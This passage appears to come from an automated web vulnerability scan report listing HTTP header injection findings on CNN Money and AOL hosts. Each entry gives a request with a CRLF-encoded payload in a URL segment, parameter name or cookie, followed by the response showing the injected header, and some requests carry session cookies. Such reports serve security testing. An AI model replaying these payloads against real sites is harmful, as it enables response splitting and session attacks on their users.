Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/624dd
7a44fd8182c
/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/624dd
7a44fd81
...[SNIP]...

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 73d8b%0d%0ac2cadca0a5d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/73d8b%0d%0ac2cadca0a5d/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/73d8b
c2cadca0a5d
/index.htm
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/73d8b

...[SNIP]...

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 98825%0d%0a614e4316de0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/markets_newyork/98825%0d%0a614e4316de0 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/markets_newyork/98825
614e4316de0

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/markets
...[SNIP]...

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 404f3%0d%0a9396d192c48 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/404f3%0d%0a9396d192c48/05/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/404f3
9396d192c48
/05/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/404f3
9396d192c48/05/04/n
...[SNIP]...

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 55fd8%0d%0a5f142f61b3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/55fd8%0d%0a5f142f61b3/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/55fd8
5f142f61b3
/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/55fd8
5f142f61b3/04/
...[SNIP]...

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c9ced%0d%0a3f30ec8af45 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/c9ced%0d%0a3f30ec8af45/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/c9ced
3f30ec8af45
/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/c9ced
3f30ec8af45
...[SNIP]...

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d83ab%0d%0a0af0d3835a2 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/d83ab%0d%0a0af0d3835a2/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/d83ab
0af0d3835a2
/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/d83ab
0af0d383
...[SNIP]...

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bbae8%0d%0ad95d85a0b19 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/bbae8%0d%0ad95d85a0b19/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/bbae8
d95d85a0b19
/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/bbae8
d95
...[SNIP]...

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 63293%0d%0a77800aa245f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/63293%0d%0a77800aa245f/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/63293
77800aa245f
/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9c496%0d%0a6d08e5ce5cb was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/exxon_oil_taxes/9c496%0d%0a6d08e5ce5cb HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/exxon_oil_taxes/9c496
6d08e5ce5cb

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6fb1%0d%0aa5f49d9e87c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c6fb1%0d%0aa5f49d9e87c/05/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/c6fb1
a5f49d9e87c
/05/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c6fb1
a5f49d9e87c/05/04/p
...[SNIP]...

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 75104%0d%0a0f14aac6d68 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/75104%0d%0a0f14aac6d68/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/75104
0f14aac6d68
/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/75104
0f14aac6d68/04
...[SNIP]...

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload da453%0d%0a7f4a946b499 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/da453%0d%0a7f4a946b499/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/da453
7f4a946b499
/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/da453
7f4a946b499
...[SNIP]...

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e1cf0%0d%0a723d722c4db was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/e1cf0%0d%0a723d722c4db/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/e1cf0
723d722c4db
/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/e1cf0
723d722c
...[SNIP]...

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 66a8e%0d%0a13db8c51deb was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/66a8e%0d%0a13db8c51deb/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/66a8e
13db8c51deb
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/66a8e
13db8
...[SNIP]...

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 11290%0d%0a85aae76790b was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/banks_interchange_fees/11290%0d%0a85aae76790b HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/banks_interchange_fees/11290
85aae76790b

Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/banks_interc
...[SNIP]...

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 64dc2%0d%0a487ff0957ca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&offerId=newmail-en-us-v2&seamless=novl&64dc2%0d%0a487ff0957ca=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 00:57:52 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?64dc2
487ff0957ca
=1&sitedomain=sns.webmail.aol.com&lang=en&seamless=novl&offerId=newmail-en-us-v2&authLev=0&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3Acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&locale=us
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"


4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.aol.com
Path:   /aol/tracking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 619d2%0d%0a09d9070d268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /aol/tracking?619d2%0d%0a09d9070d268=1 HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; rs_timezone=-18000000; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_guid=4a79a288e2ef41e5885351b80bce1f59:040511; TBS=prod:1304557062033:2; clickstreamid=772869981426160819; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 10:54:06 GMT
Set-Cookie: TBS=prod:1304557062033:2; Domain=search.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: TBS=prod:1304592846419:0; Domain=search.aol.com; Path=/
Location: http://search.aol.com/aol/search?s_it=channel_redir_fail&q=&619d2
09d9070d268
=1
Content-Length: 0
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 10:54:06 GMT
Keep-Alive: timeout=5, max=996
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d456f%0d%0a2970b16bd28 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739d456f%0d%0a2970b16bd28; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161864; path=/; expires=Thu, 12-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557064^1304558864|16768^1304557064^1304558864; path=/; expires=Thu, 05-May-11 01:27:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739d456f
2970b16bd28
,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 1d221%0d%0ac6c2ad9c6a7 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=1d221%0d%0ac6c2ad9c6a7&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
